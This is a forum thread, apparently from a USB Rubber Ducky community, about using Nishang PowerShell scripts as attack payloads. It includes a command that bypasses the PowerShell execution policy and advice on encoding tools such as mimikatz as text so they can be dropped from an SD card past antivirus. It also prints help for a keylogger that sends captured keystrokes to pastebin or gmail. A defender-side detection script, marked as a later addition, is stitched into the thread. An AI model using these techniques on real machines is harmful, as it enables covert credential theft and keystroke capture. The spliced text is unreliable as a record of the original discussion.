
[Info] PowerShell scripts to convert encoded text to exe and vice versa



Hello all,

Apologies in advance if this is old news to all.

Anyone checked out Nishang? It's a collection of handy PowerShell scripts for penetration testing written by Nikhil Mittal which may come in handy for Ducky payloads:

https://code.google.com/p/nishang/

http://labofapenetrationtester.blogspot.co.uk/

I had a look at http://nishang.googlecode.com/svn/trunk/ExetoText.ps1 in particular, and this uses a technique for encoding binaries to text, demonstrated here:

http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html

You may need to run the following as administrator to bypass a PowerShell security policy which may prevent you from creating an executable file:

powershell.exe -executionpolicy bypass -file ExetoText.ps1 <payload.exe> <payload.txt>

Where payload.exe is your executable e.g. mimikatz.exe and payload.txt is the encoded version of your exe file.

If you were to place this encoded text file and http://nishang.googlecode.com/svn/trunk/TexttoExe.ps1 on your SD card (if you're running twinduck firmware etc.), then you wouldn't need an Internet connection to download the file; you can just run this PowerShell script to convert the encoded text back to the exe. This may get flagged by AV so your mileage may vary.

DarkOperator also has a nice Python script and exe to generate base64-encoded PowerShell commands too:

http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html

Cheers

Aaron

Edited by redmeatuk
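A defender-side check for the encoded text files described in the post above, added here as an example; it is not code from Nishang or from the original post. The function names and the two encodings it recognises (decimal byte values and Base64) are assumptions, since the post does not state the format ExetoText.ps1 writes.

```powershell
# Added example: flag text that decodes to a Windows PE image.
# Test-PEHeader / Test-EncodedPE are hypothetical helper names.

function Test-PEHeader {
    param([byte[]]$Bytes)
    # A PE file starts with "MZ" and has a DOS header of at least 0x40 bytes.
    if ($Bytes.Length -lt 0x40 -or $Bytes[0] -ne 0x4D -or $Bytes[1] -ne 0x5A) { return $false }
    # e_lfanew (offset 0x3C) points at the "PE\0\0" signature.
    $peOffset = [BitConverter]::ToInt32($Bytes, 0x3C)
    if ($peOffset -lt 0 -or $peOffset -gt ($Bytes.Length - 4)) { return $false }
    return ($Bytes[$peOffset] -eq 0x50 -and $Bytes[$peOffset + 1] -eq 0x45 -and
            $Bytes[$peOffset + 2] -eq 0 -and $Bytes[$peOffset + 3] -eq 0)
}

function Test-EncodedPE {
    param([string]$Text)
    $t = $Text.Trim()
    [byte[]]$decoded = @()

    if ($t -notmatch '[^\d\s,]') {
        # Assumed encoding 1: decimal byte values separated by whitespace or commas.
        $values = @($t -split '[\s,]+' | Where-Object { $_ -ne '' })
        $bad = @($values | Where-Object { $_.Length -gt 3 -or [int]$_ -gt 255 })
        if ($bad.Count -gt 0) { return $false }
        $decoded = @($values | ForEach-Object { [byte]$_ })
    }
    elseif ($t -notmatch '[^A-Za-z0-9+/=\s]') {
        # Assumed encoding 2: plain Base64 (FromBase64String ignores whitespace).
        try { $decoded = [Convert]::FromBase64String($t) }
        catch { return $false }
    }
    else { return $false }

    return (Test-PEHeader $decoded)
}

# Constructed sample: 68-byte stub with MZ magic, e_lfanew = 0x40 and a PE signature.
$stub = New-Object byte[] 68
$stub[0] = 0x4D; $stub[1] = 0x5A; $stub[0x3C] = 0x40
$stub[0x40] = 0x50; $stub[0x41] = 0x45

Test-EncodedPE ($stub -join ' ')                    # decimal-byte form
Test-EncodedPE ([Convert]::ToBase64String($stub))   # Base64 form
Test-EncodedPE 'Hello all, this is ordinary text.'  # benign text
```

Payloads that are compressed or encrypted before encoding do not decode to an MZ header and are not caught by this check.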

I think that somebody else suggested Nishang also. If I can get some more time on my hands I would love to make ducky payloads using Nishang. The biggest problem is figuring out how all the tools in the project work. Are there any tutorials showing how they work?


I downloaded Nishang, and can't figure out how to get the script's help file to show. I keep typing in the command, and the computer gives me an error. Basically what the error says is that the script file is not in PowerShell's help file. I don't want it to check PowerShell's help file though, I want it to check the current working directory. Here is the output:

PS G:\nishang_0.2.7\nishang> Get-Help Keylogger.ps1 -full
Get-Help : Get-Help could not find Keylogger.ps1 in a help file in this session. To download updated help topics type:
"Update-Help". To get help online, search for the help topic in the TechNet library at
http://go.microsoft.com/fwlink/?LinkID=107116.
At line:1 char:1
+ Get-Help Keylogger.ps1 -full
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [Get-Help], HelpNotFoundException
    + FullyQualifiedErrorId : HelpNotFound,Microsoft.PowerShell.Commands.GetHelpCommand

PS G:\nishang_0.2.7\nishang>

overwraith, not really seen any tutorials for Nishang; there should be some examples on http://labofapenetrationtester.blogspot.com

As for displaying the help for the PowerShell scripts, try placing a .\ before the script; it worked for me:

PS C:\Users\luser\Desktop\nishang> Get-Help .\Keylogger.ps1 -full


NAME
    C:\Users\luser\Desktop\nishang\Keylogger.ps1


SYNOPSIS
    Nishang Payload which logs keys.


SYNTAX
    C:\Users\luser\Desktop\nishang\Keylogger.ps1 [-dev_key] <String> [-username
    ] <String> [-password] <String> [-keyoutoption] <String> [-MagicString] <St
    ring> [-CheckURL] <String> [<CommonParameters>]




DESCRIPTION
    This payload logs a user's keys and writes them to file key.log (I know its
     bad :|) in user's temp directory.
    The keys are than pasted to pastebin|tinypaste|gmail|all as per selection.




PARAMETERS
    -dev_key <String>
        The Unique API key provided by pastebin when you register a free accoun
        t.
        Unused for tinypaste.
        Unused for gmail option.


        Required?                    true
        Position?                    1
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -username <String>
        Username for the pastebin account where data would be pasted.
        Username for the tinypaste account where data would be pasted.
        Username for the gmail account where attachment would be sent as an att
        achment.


        Required?                    true
        Position?                    2
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -password <String>
        Password for the pastebin account where data would be pasted.
        Password for the tinypaste account where data would be pasted.
        Password for the gmail account where data would be sent.


        Required?                    true
        Position?                    3
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -keyoutoption <String>
        The method you want to use for exfitration of data.
        "0" for displaying on console
        "1" for pastebin.
        "2" for gmail
        "3" for tinypaste


        Required?                    true
        Position?                    4
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -MagicString <String>
        The string which when found at CheckURL will stop the keylogger.


        Required?                    true
        Position?                    5
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    -CheckURL <String>
        The URL which would contain the MagicString used to stop keylogging.


        Required?                    true
        Position?                    6
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?


    <CommonParameters>
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer and OutVariable. For more information, type,
        "get-help about_commonparameters".


INPUTS


OUTPUTS


    -------------------------- EXAMPLE 1 --------------------------


    PS >.\Keylogger.ps1 3 <dev_key> <username> <pass>




RELATED LINKS
     http://labofapenetrationtester.blogspot.com/
    http://code.google.com/p/nishang
Edited by redmeatuk

I get this output.

PS G:\nishang_0.2.7\nishang> dir


    Directory: G:\nishang_0.2.7\nishang


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/21/2013   2:19 PM       4993 Get-WLAN-Keys.ps1
-a---         5/21/2013   2:24 PM       7936 Information_Gather.ps1
-a---        11/21/2012   5:23 AM       5507 Invoke-Medusa.ps1
-a---        11/21/2012   5:22 AM       4306 Invoke-PingSweep.ps1
-a---         5/20/2013  10:02 AM       9328 Keylogger.ps1
-a---         2/20/2013   1:22 PM      14114 Parse_Keys.ps1
-a---         1/19/2013   9:14 PM       7690 Prasadhak.ps1
-a---         2/13/2013   9:48 AM       2157 Remove-Update.ps1
-a---          4/8/2013   2:12 PM    1340496 Run-EXEonRemote.ps1
-a---        11/21/2012   7:46 AM       1056 Speak.ps1
-a---        11/21/2012   7:46 AM       1228 StringToBase64.ps1
-a---        11/21/2012   7:46 AM       1572 TexttoExe.ps1
-a---         5/22/2013   2:10 AM       6171 Time_Execution.ps1
-a---         5/21/2013   2:31 PM      13372 Wait_For_Command.ps1
-a---        11/21/2012   7:44 AM       1994 Base64ToString.ps1
-a---        11/21/2012   7:44 AM       1327 Browse_Accept_Applet.ps1
-a---         6/10/2013   3:37 AM       2386 CHANGELOG.txt
-a---          5/1/2013   3:35 AM      12712 Check-VM.ps1
-a---          4/8/2013   8:47 AM       3297 Create-MultipleSessions.ps1
-a---         5/21/2013   2:19 PM      11890 Credentials.ps1
-a---         5/23/2013   3:56 AM      19208 DNS_TXT_Pwnage.ps1
-a---         6/10/2013   3:55 AM        849 Download-Execute-PS.ps1
-a---          5/1/2013   3:33 AM        755 Download.ps1
-a---         1/27/2013  10:38 PM       1800 Download_Execute.ps1
-a---         1/31/2013  10:45 PM       5511 Enable-DuplicateToken.ps1
-a---        11/27/2012  12:14 PM       3869 Execute-Command-MSSQL.ps1
-a---        11/21/2012   7:45 AM       1524 ExetoText.ps1
-a---         5/22/2013   3:22 AM      13069 Get-LSASecret.ps1
-a---         5/22/2013   5:36 AM      22648 Get-PassHashes.ps1
-a---         5/22/2013   9:20 AM        709 README.txt


PS G:\nishang_0.2.7\nishang> Get-Help .\Keylogger.ps1 -full
Get-Help : Get-Help could not find .\Keylogger.ps1 in a help file in this session. To download updated help topics
type: "Update-Help". To get help online, search for the help topic in the TechNet library at
http://go.microsoft.com/fwlink/?LinkID=107116.
At line:1 char:1
+ Get-Help .\Keylogger.ps1 -full
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [Get-Help], HelpNotFoundException
    + FullyQualifiedErrorId : HelpNotFound,Microsoft.PowerShell.Commands.GetHelpCommand

PS G:\nishang_0.2.7\nishang> 

I haven't coded a day of PowerShell in my life though, so this is to be expected.
